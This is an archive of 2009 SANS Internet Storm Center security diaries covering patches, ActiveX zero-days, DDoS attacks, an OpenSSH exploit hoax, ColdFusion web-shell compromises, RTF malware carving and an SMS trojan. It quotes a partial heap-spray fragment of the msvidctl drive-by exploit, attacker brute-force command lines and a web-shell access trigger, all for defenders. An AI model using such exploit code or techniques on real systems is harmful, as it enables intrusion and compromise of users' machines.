MS09-031 When using Radius OTP authentication, a user can bypass authentication leading to privilege escalation and access to resources.
ISA server 2006

KB 970953 No known exploits Severity:Important
N/A Critical
MS09-032 Cumulative killbit update, adds killbits for the recently discussed video ActiveX control.
Note there are recently discovered killbits one should set that are not included in this update.
Replaces MS08-032.
ActiveX killbits

KB 973346 Workaround for active exploitation included
MS09-033 A privilege escalation problem exists in the handling of privileged instructions on the guest OS.
Virtual PC, Virtual server

KB 969856 No known exploits Severity:Important
Important Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them

(**): Assuming a worst case scenario

(***): If you use virtual server to create a shared environment and have users accessing virtual machines while not allowing them to manage the system, make that critical.

Swa Frantzen -- Section 66


Published: 2009-07-14

Recent attacks and a false sense of security

With the most recent ActiveX vulnerability (CVE-1136-2009) still very fresh and the attacks still evolving out there, reactive protection mechanisms need to update for such exploits rapidly, and as the exploit is quite easy to modify and obfuscate they have their work cut out for them.

Still some out there might get lulled into feeling safe and above all of this e.g.:

  • IPS (or IDS) users e.g. might feel their device will protect them. Let's see: will it protect you if the (hacked) website your user visits is of the https kind ? I'd not be convinced at all.
    Yet the link to a fortinet advisory sent in by Juha-Matti states: "Fortinet customers who subscribe to Fortinet’s intrusion prevention (IPS) service should be protected against this remote code execution vulnerability"
    Hmm. do get that killbit out there nonetheless, it'll help much more fundamentally.
  • The same goes for other IDS/IPS vendors and most likely for AV vendors as well. Let's not forget there is a metaploit module for this and most of the signature makers I've talked to consider it too hard to make a signature for all possible exploits from metaploit.
  • Then there is those of us who simply don't use windows and/or IE and hardly are surprised ActiveX once again is an attack vector cutting deep. But let's not forget other browsers have their vulnerabilities too. A popular exploit site e.g.mentions a new Firefox Firefox Memory Corruption Vulnerability. And Secunia seems to be confirming it as well (Thanks for the anonymous reports).

So what would I do in a corporate setting? 

  • Get the killbit set ASAP
  • Provide staff up front with a choice of 2 browsers, make sure they know they have a choice (and keep both up to date). This yield diversity which is a good thing. Most importantly be ready to forbid and technically block either one as you need it to keep them safe should it get out of control anyway. Such a measure can be part of your BCP/DRP.
  • Make sure nobody sees this as a reason not to have things like AV and IDS as they will catch some of it, maybe enough, but even more so because too often the AV on a desktop is the only line of defense (e.g. with encrypted traffic)

Swa Frantzen -- Section 66


Published: 2009-07-13

Security Update available for Wyse Device Manager

From their advisory: "Buffer overflow vulnerabilities have been reported in Wyse Device Manager (WDM) Server and the WDM HAgent. A carefully crafted packet sent to the WDM Server port or the WDM Agent would crash the service, and could potentially allow the attacker to take control of the affected system. The security update addresses the vulnerability by modifying the way WDM validates the data and handles the error resulting in the exploitable condition. Wyse recommends that customers upgrade to the latest version of WDM (4.7.2) and apply the security update at the earliest opportunity."

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-07-13

* Infocon raised to yellow for Excel Web Components ActiveX vulnerability

The SANS Internet Storm Center has raised the Infocon to yellow for 24 hours to raise awareness of active exploitation of the Office Web Components ActiveX vulnerability in this diary: http://isc.sans.org/diary.html?storyid=6778

As more information is made available the diary will be updated. After 24 hours the Infocon will return to green.

Update1: The Infocon is returning to green.

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-07-13

Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution

Microsoft has released an advisory related to an Office Web Components ActiveX vulnerability, it is available here. This vulnerability exists in the ActiveX control used by IE to display Excel spreadsheets. The CVE entry for the vulnerability is CVE-2009-1136. Microsoft mentions that they are aware of active exploits against this vulnerability, although we at the SANS Internet Storm Center haven't seen it used or mentioned in public. Which may tend to indicate it has been used in targeted rather than broad attacks. At the moment there is no patch, there is a workaround, and it can be automated for enterprise deployment. The specific CLSIDs to set the killbit for are:


Start working on this on ASAP. The impact is remote code execution with the privileges of the logged in user running Internet Explorer, and might not require user intervention. As in browse to a nasty web site and be pwn3d.

Advisory: http://www.microsoft.com/technet/security/advisory/973472.mspx

KB article: http://support.microsoft.com/kb/972890

SRD blog: http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx

MSRC blog: http://blogs.technet.com/msrc/archive/2009/07/13/microsoft-security-advisory-973472-released.aspx

There is a long list of affected products:

  • Microsoft Office XP Service Pack 3;
  • Microsoft Office 2003 Service Pack 3;
  • Microsoft Office XP Web Components Service Pack 3;
  • Microsoft Office Web Components 2003 Service Pack 3;
  • Microsoft Office 2003 Web Components for the  2007 Microsoft Office system Service Pack 1;
  • Microsoft Internet Security and Acceleration Server 2004 Standard Edition Service Pack 3;
  • Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition Service Pack 3;
  • Microsoft Internet Security and Acceleration Server 2006;
  • Internet Security and Acceleration Server 2006 Supportability Update;
  • Microsoft Internet Security and Acceleration Server 2006 Service Pack 1; and
  • Microsoft Office Small Business Accounting 2006.

If you see exploit code for this vulnerability, or have knowledge of it being used in an attack please let us know via our contact page.

Adrien de Beaupré

Teaching SANS Cutting-Edge Hacking Techniques in Ottawa this September.


Published: 2009-07-12

CA Apologizes for False Positive

One of our readers, Melvin, was kind enough to send us a heads up on an issue with CA DAT files.   The site refers to a "false positive" detection for Win32/Amalum for detections via Microsoft Windows Service Pack 3 and commercial application, Cygwin.  The files are quarantined and the file is appended with the extension "*.AVB".  The files will still be intact and organizations running ISS should restore files from the GUI.  For those using ITM, a search tool is available from CA support upon request. 

Please update your signatures to DAT 6606 to ensure protection from the false positive.  Here is a link to the CA statement. 

Mari Nichols



Published: 2009-07-11


We are aware that Imageshack was attacked by the anti-sec group.  This seems to be affecting other sites that draw images from imageshack such as user pages on blogger.com.

Details were posted on Full Disclosure by anti-sec.  The "session" they display reminds us of the log file they made public following their attack on SSANZ last weekend. 

If you have any additional technical details please submit them to our contact form.  Also, if you are aware of any sites impacted by this attack please let us know.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2009-07-11

VMWare Security Advisories

I would like to thank Kirk at VMWare for alerting us to a couple of  security advisories. 

Both concern updates to the ESX Service Console:

VMSA-2009-0009, a new advisory concerning  ESX Service Console updates for udev, sudo, and curl.

VMSA-2009-0008, an advisory from June 30th, has been updated.  It is an ESX Service Console update for krb5.


Happy patching!


-- Rick Wanner - rwanner at isc dot sans dot org


Published: 2009-07-10

WordPress Fixes Multiple vulnerabilities

WordPress 2.8.1 has been released to fixes many bugs and tightens security for plugin administration pages. Some admin pages added by certain plugins could be viewed by unprivileged users, resulting in information being leaked. Not all plugins are vulnerable to information leak but WordPress advise upgrading to 2.8.1 to be safe.

WordPress announcement is posted here

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

Teaching Comprehensive Packet Analysis in Ottawa, ON this coming September


Published: 2009-07-09

OpenSSH 0day FUD

For the last couple of days we've been all witnesses of FUD surrounding a supposed 0-day exploit for OpenSSH skyrocketing.

At this moment, it definitely looks like we're dealing with a hoax – even more, it's not the first time someone said they have a 0-day exploit for SSH. So, let's see some facts about this.

It appears that the whole story started after a post to the Full-Disclosure mailing list on the 4th of July (http://seclists.org/fulldisclosure/2009/Jul/0028.html). The post supposedly shows a hacker group using a 0-day exploit for SSH to compromise a server. After doing some research here, it appears that this is a long standing argument between two guys (or groups). One of our readers submitted the following URL address (http://flx.me/astahack2.txt), which shows another hack.

The "exploit" used in that file is a brute force attack for sure, as can be seen below:

anti-sec:~/pwn/xpl# ./openPWN -h -p 2222 -l=users.txt

See the "-l" option? That supplies the list of users it will try to brute force.
Additionally, a bit below it even prints which user was hacked:


       user: crownvip
       uname: Linux srv01.webhostline.com #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux

Now, what has been posted on the Full-Disclosure list (the supposed
exploit) looked like this:

anti-sec:~/pwn/xpl# ./0pen0wn -h xx.yy.143.133 -p 22

Same group, same server, same directory – different file name. Why didn't they use the mighty 0-day first time? They brute forced into the server and then had to jail break.
This looks very much like a hoax to me – and this is the only evidence we have about a 0-day? A post from an anonymous e-mail address (hushmail) to the Full-Disclosure mailing list (which, we all have to admit, isn't the best source of verified information)? And this was even enough for some web hosting companies to *shut down* their SSH service? I find this unbelievable.

Finally, OpenSSH developers would probably agree with me – one of the developers sent an e-mail to the Openssh-unix-dev mailing list (http://lwn.net/Articles/340483/) also stating the obvious.

So, I'd like to ask everyone not to spread the FUD anymore. Every piece of evidence we received so far points only to brute force attacks on SSH servers (which have been around for years!). Do keep an eye on your server and install all patches. We will post more information if we receive it, but until then I think there was enough of this FUD.




Published: 2009-07-09

Latest Updates on Ongoing DDoS on Governmental/Commercial Websites in USA and S. Korea

 A quick update on the DDoS of various govermental/commercial sites in the US and South Korea. At this point, the security researcher community is still working on the particular malware involved, the sites involved and how to remediate the ongoing threat.  However, what is clear is that more or less well-known techniques are being used to debilitate the online presence of the aforementioned governmental/commerical entities.

First, the governmental is still operational.  This attack, while problematic, doesn't stop the country from working. If ftc.gov is offline, the economy doesn't crash. Based on that alone, this attack cannot be labelled as cyberwarfare. That isn't to say it isn't significant or a problem. However, the key takeaway is that the governments of the US and S. Korea are still working and still operational. They do not rely on their public facing websites to work. 


While more technically specific writeups are conducted (and conference calls and the like are being held around the clock on this one), some quick points.  It does not seem that any new novel techniques are being used.  A new DDoS toolkit, perhaps, but well-known attacks.  Simply flood the target with requests beyond that which it can handle.


This leads to a lose-lose proposition.  Do nothing and those who accumulate a botnet of not remarkable size being able to debilitate the ability of entities from operating online.  The other side is spending enough resources to be able to handle the traffic which imposes costs on the victim which is still a "success" for the bad guys.  On the one hand, no service, on the other hand, very excessive cost to provide service. No matter which path we choose, we lose.  It's just a question of how much.


The core problem is that bandwidth is limited but the ability to control a vast army of machines (i.e. botnets) is trivial.  The solution to this problem isn't remediating DDoS per se, it's remediating the triviality of getting lots of end-users to get themselves infected with malware. This latest denial of service is just another indicator of the core problem.


The problem is that end-users cannot (nor should not be expected to) secure their home hardware.  They simply lack the skills (and we shouldn't lament this, these skills being a scarce commodity allows us to demand high salaries after all). The responsibility must be shifted to the person closest to the user with the resources and skills to remediate this problem, namely, the ISPs. Until we get to that point, these problems will keep recurring.


Until then, researchers continue to work around-the-clock to play whack-a-mole to the latest attempts.  Thankfully, they are few and far between but in an increasingly "cyberwarfare" oriented world, that won't be for long.



John Bambenek

bambenek /at/ gmail /dot/ com


Published: 2009-07-08

Safari 4.0.2 update published

It looks like Apple released safari 4.0.2 for OS X and Windows platforms.

It would appear that this new versions addresses the following security related issues in WebKit (as well as some performance increases in the nitro JS engine).

Detailed information can be found at Apples KB article: http://support.apple.com/kb/HT3666


CVE-ID: CVE-2009-1724
  Visiting a maliciously crafted website may lead to a cross-site scripting attack
Description: An issue in WebKit's handling of the parent and top objects may result in a cross-site scripting attack when visiting a maliciously crafted website. This update addresses the issue through improved handling of parent and top objects.

CVE-ID: CVE-2009-1725
Impact:  Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.
Description: A memory corruption issue exists in WebKit's handling of numeric character references. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved handling of numeric character references. Credit to Chris Evans for reporting this issue.

You can get the new version of Safari at the url below.



Published: 2009-07-08

Milw0rm offline

We've received multiple emails today from readers who cannot reach Milw0rm.  The site's owner, str0ke, left this message on the site yesterday:

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2009-07-08

RFI: DDoS Against Government and Civilian Web Sites

We are aware of an ongoing DDoS against several high-profile web sites.  Public details are in these online stories:



There have also been sketchy reports that South Korean websites are experiencing outages.  We are looking for any additional information, especially technical reports or packet captures.  Please use our contact page.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2009-07-07

* INFOCON Status - staying green

We had some internal discussion overnight about whether to raise our Infocon status to YELLOW because of an 0-day in a Microsoft ActiveX control that was reported yesterday (see the diaries:  Internet Explorer and DirectShow).  Because there is adequate coverage in the security software community (IDS detection, AV detection, etc.) and Microsoft has a bulletin available we decided to stay GREEN.  However, we are flashing the Infocon globe so if you are using Tom Liston's Infocon tracking tool it should be blinking.  Consider this a "test of the emergency broadcast system" as well as a reminder to change the batteries in your smoke detectors.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2009-07-07

OpenSSH Rumors

Over the past 24 hours we've had a number of readers tell us that there is an OpenSSH exploit in active use.  We cannot confirm its existence, other than a DOS exploit for OpenSSH that recently showed up on Milw0rm.  If you have any concrete evidence of this (not rumors or URLs to blogs where people are discussing that there might be a problem) please let us know via our contact form.  Again, no rumors and no links to discussions of rumors please.  We need reports of active exploitation or other evidence that this a real issue.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2009-07-06

IE 0day exploit domains (constantly updated)

This diary entry contains a list of domains that are exploiting the new IE-0day as well as secondary domains that are hosting potentially malicious binaries utilized in these attacks.  This list  has been produced as a combined effort of researchers, vendors, and volunteers. You can thank the groups below for their efforts and their willingness to share this information with the public.  This list is intended to serve as a quick way to provide protection against these attacks by identifying domains that are hosting these (and potentially other) exploits. This list is not formatted for any specific file format, it is up to you the reader to translate this date into the proper formatting that your environment requires.   

** In regards to IDS/IPS signatures, I would highly suggest looking for the malformed file vs trying to catch every permutation of the JS/Html seen.  Emerging threats has a signature that looks for the malformed file, it can be found in their main rules file.   2009493 - ET CURRENT_EVENTS Likely MSVIDCTL.dll exploit in transit (emerging.rules)

This diary entry will be updated frequently. The information provided has had varying degrees of verification performed on it. As such this information is provided as is.  There may very well be mistakes, mistakes that may result in legitimate sites being blocked if you choose to use this list as a block list.

Link on how to leverage DNS to blackhole/redirect queries.


Google Cache version of the above link


Massive thanks go to the following contributors:

IBM X-Force
Sunbelt Software
Telenor SOC


List of exploit domains:


Second stage domains (binaries downloaded from these domains):


Ip's (no domain used in exploit page):


Published: 2009-07-06

0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available.

A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400 

Details of the exploit are available on the CSIS web site, but are included below:

var appllaa='0';

var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;


var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;







memory=new Array();



var myObject=document.createElement('object');








Published: 2009-07-05

More on ColdFusion hacks

Thanks to our readers Adam and Oobi we received some additional information regarding recent ColdFusion hacks.
As I wrote in the previous diary (http://isc.sans.org/diary.html?storyid=6715), the attackers are exploiting vulnerable FCKEditor installations, which come enabled by default with ColdFusion 8.0.1 as well as some other ColdFusion packages.

The first thing the attackers do is uploading a ColdFusion web shell – a script very similar to ASP.NET or PHP web shells we've been writing so much about. The web shell I analyzed is very powerful and seems to be recent – according to the date in the script it was released on the 23rd of June by a Chinese hacker "Seraph".

The script has a simple authentication mechanism – it verifies what the URL parameter "action" is set to, as can be seen in the screenshot below:

seraph action variable test

If the parameter "action" is set to "seraph", the user can access the web site, otherwise the script just prints back "seraph". In other words, the URL the attacker accesses after uploading the script will look something like this: http://www.hacked.site/uploaded_file.cfm?action=seraph

A nice thing (for us doing forensics, at least) is that you can now grep through your logs for "action=seraph" to see if you have been hacked with the same script. Keep in mind that this is not a definite test, of course, since the action variable's name can be easily modified.



Published: 2009-07-03

Happy 4th of July!

Celebrate, watch fireworks, but don't click on links in emails or surf to sites with Fourth of July, Independence day, or Fireworks as key words. Websense is reporting that Waledac will be using the above subjects in emails with links to sites that appear to be a video, but instead downloads malware. Their alert is here. More information is also available at the ESET blog here.

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-07-03

FCKEditor advisory

"FCKeditor, a web based open source HTML text editor, suffers from a remote file upload vulnerability." The advisory is here. CVE-2009-2265 has been assigned to the vulnerability. The patch and a new version of the editor will be available next week (06 July). Keep a close eye on any system with this package installed on it, it is recommended to follow mitigation steps in the advisory in the meantime. A number of compromises have been reported as a result of the exploit being used prior to now. Thanks Andrea.

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-07-03


Question, what do Bing.com and Authorize.net have in common? Who would have guessed that they both have servers located in a data center that has had a fire? Or that they may have to put more into the planning portion of Disaster Recovery and Business Continuity? Authorize.net has been completely down for several hours now. Bing.com/travel had this to say: "A fire occurred at Fisher Plaza in downtown Seattle just after midnight on Friday morning. The blown transformer knocked out power to the entire building, which is home to the Bing Travel servers. We're hard at work to restore service following this unexpected event. Our current estimate for re-establishing Bing Travel functionality is 5pm PST, July 3rd." Perhaps they should have read one of our SANS papers on BCP/DRP planning.  Reading room link is here. More information is available at this twitter http://twitter.com/authorizenet where Authorize.net are tweeting. The media are also following the story, KOMO a local station was knocked offline but are broadcasting from a backup site. 


Update: Authorize.net appear to be at least partially back up and running.


Published: 2009-07-03

Authorize.net down

The credit card payment gateway authorize.net is currently down. A fire at their data center is apparently the cause.  Thanks to Joey, Tommy, and Jonathan for writing in.

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-07-02

Cold Fusion web sites getting compromised

There have been a high number of Cold Fusion web sites being compromised in last 24 hours. We received several e-mails about this.

It appears that the attackers are exploiting web sites which have older installations of some Cold Fusion applications. These applications have vulnerable installations of FCKEditor, which is a very popular HTML text editor, or CKFinder, which is an Ajax file manager. The vulnerable installations allow the attackers to upload ASP or Cold Fusion shells which further allow them to take complete control over the server.

The attacks we've been seeing in the wild end up with inserted <script> tags into documents on compromised web sites. As you can probably guess by now, the script tags point to a whole chain of web sites which ultimately serve malware and try to exploit vulnerabilities on clients.

What's interesting is that the group behind this is probably connected (if not the same) as the group that performed a lot of similar attacks back in March. I wrote several diaries about them – see http://isc.sans.org/diary.html?storyid=6001 and http://isc.sans.org/diary.html?storyid=6010

Back in March, once they gained access to the server, they used a local privilege escalation exploit for a vulnerability that was, at that time, unpatched. If your servers are up to date with Microsoft patches, the vulnerability has been patched but they still can modify local web site files in a lot of cases (and sometimes even more, depending on Cold Fusion's configuration).

We'll be carefully monitoring the situation with this, of course. In the mean time, make sure that all applications you are running are up to date and fully patched. Another thing you might want to do is check for any old software you might have on your servers – it is very common for applications to leave old, vulnerable parts that are not used any more hanging around. And such applications are just waiting to be compromised.

Thanks to Adam for giving us an early heads up.



Published: 2009-07-02

Unpatched Bloatware on new PCs

I recently purchased a netbook, and while I like the highly portable on-the-go computing that it offers very much, booting it up for the first time was frustrating. The box took its sweet time to install a big pile of bloatware, ranging from Acer's own useless tool suite over trial versions of McAfee Internet Security and MS Office 2007 "Home Edition" all the way to the common culprits like Google Desktop & co. Software I didn't want, had never wanted, and knew full well I would have to tediously uninstall again as soon as the device finished booting. And indeed, the first start up not even fully complete, the nag screens began to appear, begging for attention and money.

Undesired pre-installed software would be annoying enough all by itself. But all this software can (will!) also contain vulnerabilities that require patching in future. As stated in my earlier post today, patching of PC applications is an unsolved problem. By forcing unwanted trialware onto customers, the hardware vendors are contributing to making the patching problem worse.

A secure and bloat-free configuration out of the box would be highly appreciated. We already have enough to worry about keeping a PC secure and up to date during its lifespan, without hardware manufacturers stacking the odds against us even further.

What do you do with the undesired software pre-installed on new PCs?  Let us know in the poll on this page.


Published: 2009-07-02

Internet Storm Center Podcast Episode Number Fifteen

Hey everyone, sorry it has taken so long to get around to recording another podcast episode!  The audio should be a bit better on this podcast, and we are going to try and get these out more often now.  Enjoy!

All the podcasts

Podcast through iTunes

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler


Published: 2009-07-02

Time to update updating on PCs for 3rd party apps

As Alan Paller wrote in last week's SANS @Risk Newsletter, home PCs contain a lot of software with a lot of vulnerabilities. The recent Shockwave hole is only one example. Yes, there are tools, like Secunia's PSI, that can help in determining which software on a PC needs urgent patching. In my experience though, the average home user is not tech savvy enough to use such tools.

Some software packages try to fix the problem by building an "auto update" feature into their product. Looking more closely into how these update mechanisms work shows that many do not verify or authenticate the updates received. If recent malware like Conficker protects its updates better than application software protects its auto-downloads, something's amiss.

Even assuming that a software package does everything right, there's still the hurdle of the OS to overcome. How do you explain to your mom or uncle or grampa the difference between a "bad" UAC prompt in Windows Vista (eg. when malware wants to sneak in) and a "good" UAC prompt (eg. when Firefox wants to apply its important security update) ?

Basically, a message box telling a user that a program needs updating doesn't work anymore. We've seen just too many pop-ups, too many annyoing requests to install Chrome or Silverlight or - worse - SuperMegaAntivirus2009, and this has left the users largely immune to anything that requests installation. The more glaringly something asks for attention, the higher the chance it will be ignored.

Microsoft has come a long way with Windows Update. Of course we still worry about the PCs of our family members whenever there's a new vulnerability, but once the patch is out, we know we can stop worrying: Windows Update works well enough that on all PCs of friends and family that I was recently pressed into duty to "check out", the Windows patches were actually current.

Now .. how do we get to the same level with all the application programs ?



Published: 2009-07-02

Getting the EXE out of the RTF

Recently, when the targeted attack with malicious RTF attachments was making the rounds, I wondered how to best get the embedded EXE extracted from the RTF for further analysis. On a Windows system, you would most likely simply copy/paste the embedded object from within RTF to an Explorer window, and end up with the original file. Since I do my malware analysis on Unix, this wasn't an option. Looking at the file, it appeared as if RTF was using some sort of hexadecimal encoding:

Now, as a command line Perl addict, hex is something I know how to deal with :-).

$cat detail.rtf | sed -e '1,3d' | perl -ne 's/(..)/print chr(hex($1))/ge' > detail.bin
$cat detail.bin | hexdump -C | more

00000000 02 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 |........Package.|
00000010 00 00 00 00 00 00 00 00 1c e4 00 00 02 00 4d 69 |.........ä....Mi|
00000020 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 20 45 6e |crosoft Word En|
00000030 64 4e 6f 74 65 20 78 32 20 65 72 72 6f 72 2e 20 |dNote x2 error. |
00000040 50 6c 65 61 73 65 20 64 6f 75 62 6c 65 20 63 6c |Please double cl|
00000050 69 63 6b 20 68 65 72 65 20 74 6f 20 76 69 65 77 |ick here to view|
00000060 20 74 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f | the original co|
00000070 6e 74 65 6e 74 2e 73 63 72 00 43 3a 5c 55 73 65 |ntent.scr.C:Use|

Sweet, we get something printable! The “sed” command deletes the first three lines, because they don't contain hex and would confuse the Perl statement that follows. The Perl code eats up two digits at once and converts them to the corresponding ASCII character, iterating through the entire file. I'm using “perl -ne” combined with “print” instead of “perl -pe” because the former makes it easier to ignore the pesky CR/LF line end markers that make Windows text so annoying on Unix. The output gets piped into “hexdump -C”, because we expect this content to be an embedded EXE file, and thus it likely contains a lot of non-printable characters that would not be fun to look at in “vi” or “more”.

A bit further down in the output, there was indeed the tell tale “MZ” marker of the beginning of a MSDOS PE header.

00000170 6c 20 63 6f 6e 74 65 6e 74 2e 73 63 72 00 00 e0 |l content.scr..à|
00000180 00 00 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff |..MZP.........ÿÿ|
00000190 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 |..¸.......@.....|
000001a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|

Easy, I thought. Let's carve out the file beginning with the MZ and we should have the EXE:

$ dd if=detail.bin of=detail.exe bs=1 skip=386
61870+0 records in
61870+0 records out
61870 bytes (62 kB) copied, 0.269451 s, 230 kB/s
$ file detail.exe
detail.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

“if” and “of” are the input and output files of the “dd” command. “bs=1” sets the step size to one byte, and “skip”, well, skips the given number of bytes at the beginning of the file. 386 is the decimal equivalent of 0x182, the offset of MZ visible in the hexdump above.

While the “file” command confirmed that I had indeed carved out an executable, something was wrong – the file didn't want to run in the emulator, and when I uploaded it to threatexpert.com, their service called it “invalid”. I quickly figured out that the RTF has a lot of crud at the end as well, which also needs to be cut off, but I still couldn't reliably determine the correct length, and hence didn't know where the last byte of the embedded executable was.

Well, time for the malware reverse engineering equivalent of the “known plaintext attack”. I used a Windows PC to embed a copy of notepad.exe into an otherwise empty RTF document of my own, and then went about analyzing this RTF until I was able to carve out the original notepad.exe. The main “AHA!” moment was when I realized that the bytes between the filename and the “MZ” header actually are the length of the embedded file. If we use our hexdump from before

00000170 6c 20 63 6f 6e 74 65 6e 74 2e 73 63 72 00 00 e0 |l content.scr..à|
00000180 00 00 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff |..MZP.........ÿÿ|
00000190 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 |..¸.......@.....|
000001a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|

the length of the file in this case is 0x00E000, which is 57344 in decimal. Back to the sample:

$ dd if=detail.exe of=detail-fixed.exe bs=1 count=57344
57344+0 records in
57344+0 records out
57344 bytes (57 kB) copied, 0.268809 s, 213 kB/s
$ file detail-fixed.exe
detail-fixed.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
$ md5sum detail-fixed.exe
82a44254c1ce2019936a8428c93f5354 detail-fixed.exe

This time, the emulator, ThreatExpert and VirusTotal were all happy with the file, and while anti-virus coverage at the time was poor, the EXE/SCR embedded within the RTF attachment was quickly confirmed as unfriendly.



Published: 2009-07-01

Special SANSFIRE 2009 Podcast Presentations - Jim Clausing

Our eigth presentation is by one of our Handlers by the name of Jim Clausing.  Jim has a really good presentation on malware analysis in a very automated fashion. This is a presentation entitled:

"Building an Automated Malware Behavioral Analysis Environment using Free and Open-source Tools"

I would suggest the way to get these podcasts is through iTunes (if you have iTunes) if not, then you can use whatever method works best for you and follow this link:


In order to subscribe through iTunes click here:

Podcast through iTunes

Audio and Slides are here: https://www.sans.org/webcasts/show.php?webcastid=92558

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler


Published: 2009-07-01

OT: Happy Birthday Canada!

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-07-01

New VMWare Security Advisory

VMWare released a new security advisory about a vulnerability in the krb5 (Kerberos) package. The vulnerability allows a remote attacker to cause a DoS or potentially execute arbitrary code on the ESX server.

According to the advisory available at http://lists.vmware.com/pipermail/security-announce/2009/000059.html all ESX versions are affected (ESXi is not affected), however, the Kerberos package is not installed by default.

In any case, I'd like to remind you to firewall and isolate your ESX servers as much as possible.



Published: 2009-07-01

Mobile phone trojans

Couple of days ago one of our readers, Frank Wolff, sent a screenshot of an unsolicited message he received through ICQ. The message was full of garbled characters but included a link to a .JAR (Java ARchive).

The JAR file contained a malicious MIDlet, which is a Java program using the application framework for MIDP (Mobile Information Device Profile). This framework is normally used on mobile phones supporting Java (almost all phones today support Java).

As JAR files are actually just ZIP archives, it's trivial to unpack them. After unpacking a JAR archive, besides class files, the most important information is in the MANIFEST.MF file, in the META-INF directory. This file defines which class gets executed first and some other information. Below is the content of the extracted MANIFEST.MF file:

Manifest-Version: 1.0
Ant-Version: Apache Ant 1.7.1
Created-By: 1.5.0_09-b03 (Sun Microsystems Inc.)
MIDlet-1: foto,/icon.png,Midlet
MIDlet-Vendor: Sun Microsystems, Inc.
MIDlet-Version: 1.0
MIDlet-Name: foto
MicroEdition-Configuration: CLDC-1.0
MicroEdition-Profile: MIDP-1.0

The class called "Midlet" is the main class so that's where the analysis should start. Since Java uses bytecode, it is possible to decompile the class files into source files – these source files are not exactly what the developer wrote, but are close enough to allow us to analyze what's going on.

After starting, this particular Trojan created a thread which sent some SMS messages. The content and the numbers were obfuscated and stored in another file embedded in the JAR archive. The obfuscation algorithm was relatively simple (just logical AND with couple of other tricks). Finally, after all deobfuscation steps, the following text came out:

7122 vin 10199|*132 vis=10199|8.55 vis ,0199|83(5 vis 1-199|713/ vis 10,99|8355=vis 101$9|

The messages are separated with the "|" character, however it appears that the deobfuscation algorithm (or obfuscated data) had some errors. In any case, the Trojan tries to send 6 SMS messages as above.

However, after doing all this work, there are couple of questions that I still could not answer. First, I would be interested to hear from our readers if someone can confirm whether Trojans like this can send SMS messages from the mobile phone without any user interaction. If they can, then the overall risk is indeed higher.

If you can recognize numbers and/or messages above please let us know what the purpose of the Trojan is (probably make some money for the attacker).

